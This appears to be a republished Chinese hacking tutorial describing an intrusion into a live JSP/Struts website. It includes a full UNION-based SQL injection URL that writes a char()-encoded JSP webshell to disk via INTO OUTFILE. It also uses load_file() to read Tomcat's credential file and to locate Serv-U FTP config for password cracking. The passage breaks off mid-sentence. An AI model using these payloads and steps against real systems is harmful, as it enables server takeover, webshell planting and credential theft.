当前位置:编程学习 > JAVA >>

入侵基于java Struts的JSP网站(续)

作者:sai52[B.H.S.T]
blog:www.sai52.com

前言:

如果新手朋友不知道什么是Struts,可以参见文章

《入侵基于java Struts的JSP网站》http://www.zzzyk.com/kf/200808/28937.html

《入侵基于java Struts的JSP网站》是好友skyfire所作,被一些大的网站转载,却都没有写上作者名字,请允许我在这里鄙视一下他们。

正文:

给朋友帮忙检测一个jsp的站点,mysql数据库。已知存在注入点,用order by 猜出了字段是15个,其他就什么有用的信息都没暴出来。union查询的时候,字段数正确但不显示正常画面。

 

1.jpg
大小: 54.97 K
尺寸: 500 x 106
浏览: 2 次
点击打开新窗口浏览全图

 

嘿嘿,别让错误信息给骗了,实际上还是能union查询的,就在“10”的那个位置。

 

2.jpg
大小: 70.9 K
尺寸: 500 x 144
浏览: 0 次
点击打开新窗口浏览全图

 

查询得知MYSQL版本是4.1.19,root权限,可读文件(如果知道路径的话)。

狠狠地扫了它一遍(这里要注意,用wwwscan扫ip和扫网址得到的结果不同,要扫2次)。

 

3.jpg
大小: 29.5 K
尺寸: 385 x 190
浏览: 0 次
点击打开新窗口浏览全图

 

 

4.jpg
大小: 110.82 K
尺寸: 500 x 256
浏览: 0 次
点击打开新窗口浏览全图

 

 

5.jpg
大小: 58.08 K
尺寸: 500 x 172
浏览: 1 次
点击打开新窗口浏览全图

 


得到很多有用的信息,其中包括:

网站的物理路径:D:china
网站后台登陆地址:http://www.site.org.cn/admin/login.jsp
TOMCAT的后台登陆地址:http://xxx.xx.xxx.xx/admin/

 

1. 用into outfile导出一句话webshell

注入点能够使用union,有File权限,知道了网站的物理路径,jsp又没有类似magic_quotes_gpc = on这样的设置,正适合用into outfile导出一句话webshell。

  1. http://www.site.org.cn/XXXXMessage.jsp?id=7676%20and%201=2%20union%20select%
  2. 200,1,2,3,4,5,6,7,8,9,char(60,37,32,105,102,40,114,101,113,117,101,115,116,46,
  3. 103,101,116,80,97,114,97,109,101,116,101,114,40,34,102,34,41,33,61,110,117,108,
  4. 108,41,40,110,101,119,32,106,97,118,97,46,105,111,46,70,105,108,101,79,117,116,
  5. 112,117,116,83,116,114,101,97,109,40,97,112,112,108,105,99,97,116,105,111,110,
  6. 46,103,101,116,82,101,97,108,80,97,116,104,40,34,92,34,41,43,114,101,113,117,
  7. 101,115,116,46,103,101,116,80,97,114,97,109,101,116,101,114,40,34,102,34,41,41,
  8. 41,46,119,114,105,116,101,40,114,101,113,117,101,115,116,46,103,101,116,80,97,
  9. 114,97,109,101,116,101,114,40,34,116,34,41,46,103,101,116,66,121,116,101,115,40,
  10. 41,41,59,32,37,62),11,12,13,14%20into%20outfile%20D:\china\19h.jsp/* 


第一次没有成功,不知道哪里出错,导出的jsp-webshell不能正常使用,后来发现导出的webshell有15M那么大。(=_=!)

 

6.jpg
大小: 15.28 K
尺寸: 468 x 115
浏览: 0 次
点击打开新窗口浏览全图

 

虽然失败了,不过访问导出的webshell,页面出错却暴出了TOMCAT的物理路径 D:Tomcat 5.0 。:)

再次导出jsp-webshell,这次成功了,利用一句话webshell上传了个大马。查看得到的一句话webshell内容如图

 

7.jpg
大小: 23.46 K
尺寸: 500 x 96
浏览: 0 次
点击打开新窗口浏览全图

 

查看权限,是system。

 

8.jpg
大小: 38.06 K
尺寸: 500 x 140
浏览: 0 次
点击打开新窗口浏览全图

 

本该结束了,不过一时性起,就把能想到的手段都用了一遍(闲的)。(=_=!)
PS:后面的方法都没有利用之前得到的webshell。

 

2.读取TOMCAT后台密码登陆TOMCAT管理后台

刚才无意中暴出TOMCAT的物理路径 D:Tomcat 5.0 ,又知道TOMCAT的后台登陆地址,接下来当然是直接load_file()读取tomcat-user.xml文件了。(TOMCAT密码文件,默认保存在 TOMCAT目录下conf omcat-user.xml)

 

9.jpg
大小: 106.66 K
尺寸: 500 x 171
浏览: 0 次
点击打开新窗口浏览全图

 

读到密码,顺利登陆/admin 目录。

 

10.jpg
大小: 91.41 K
尺寸: 500 x 275
浏览: 0 次
点击打开新窗口浏览全图

 

TOMCAT在/admin 目录下的利用只能遍历一下目录,需要和其他方法结合才好用。
而能直接得到webshell的/manager/html目录,因为8080端口登陆不上去,这里就略过了。

 

3.读取ServUDaemon.ini破解密码利用ftp上传webshell

 

11.jpg
大小: 32.2 K
尺寸: 438 x 161
浏览: 0 次
点击打开新窗口浏览全图

 

开始想load_file()读取

C:Documents and SettingsAll Users「开始」菜单\程序Serv-UServ-U Administrator.lnk

文件,直接得到serv-u的安装路径的,结果猜错了路径,没有读到(后来发现是在                      C:Documents and SettingsAll Users「开始」菜单\程序Serv-U FTP ServerServ-U Administrator.lnk),只好按默认路径猜,在猜到 C:Program FilesServ-U 的时候读

补充:软件开发 , Java ,
CopyRight © 2022 站长资源库 编程知识问答 zzzyk.com All Rights Reserved
部分文章来自网络,